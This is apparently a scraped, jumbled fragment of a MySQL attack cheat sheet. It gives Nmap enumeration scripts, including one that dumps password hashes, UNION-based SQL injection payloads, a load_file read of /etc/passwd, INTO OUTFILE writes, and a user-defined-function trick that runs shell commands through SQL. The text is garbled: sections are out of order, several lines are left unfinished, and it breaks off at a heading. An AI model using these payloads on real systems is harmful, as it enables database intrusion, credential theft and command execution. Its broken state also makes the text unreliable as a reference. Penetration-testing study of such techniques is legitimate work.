MySQL HackTricks Verified

By default, MySQL listens on TCP port 3306. However, obfuscated environments might host it on alternative ports (e.g., 33060 for MySQL X Protocol). Use Nmap to verify the service version and run default enumeration scripts: nmap -sV -sC -p 3306

Banner Grabbing

: Instructions on using LOAD_FILE() and INTO OUTFILE to read or write local files, which can lead to Remote Code Execution (RCE).

Replace spaces with:

MySQL running as root or with file_priv + write access to plugin_dir.

CREATE FUNCTION do_system RETURNS INTEGER SONAME 'exploit.so'; SELECT do_system('id > /tmp/out');

The information provided in this article is for educational purposes only. The author and the website do not assume any legal or professional responsibility for the use or misuse of the information provided.

: Always upgrade to MySQL 8.0+ and use SQL SECURITY DEFINER carefully.

The INTO OUTFILE clause writes query results to a file on the server. : secure-file-priv must be disabled, and MySQL must have write permissions on the target directory.

Used when the application reflects the query results directly on the page.

' ORDER BY 1-- - , ' ORDER BY 2-- -

Find data types and reflections: ' UNION SELECT 1,2,3-- -

User-Defined Functions (UDF) are custom functions that extend MySQL's functionality through dynamically loadable libraries written in C/C++. Attackers can compile and upload malicious shared libraries (.so on Linux, .dll on Windows) that call system commands, then execute them through SQL.

' UNION SELECT NULL, load_file('/etc/passwd'), NULL-- - ' UNION SELECT NULL, load_file('C:\\Windows\\win.ini'), NULL-- -

--script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-

Metasploit Scanners: Tools like auxiliary/scanner/mysql/mysql_version can verify remote service details.

2. Verified Authentication & Access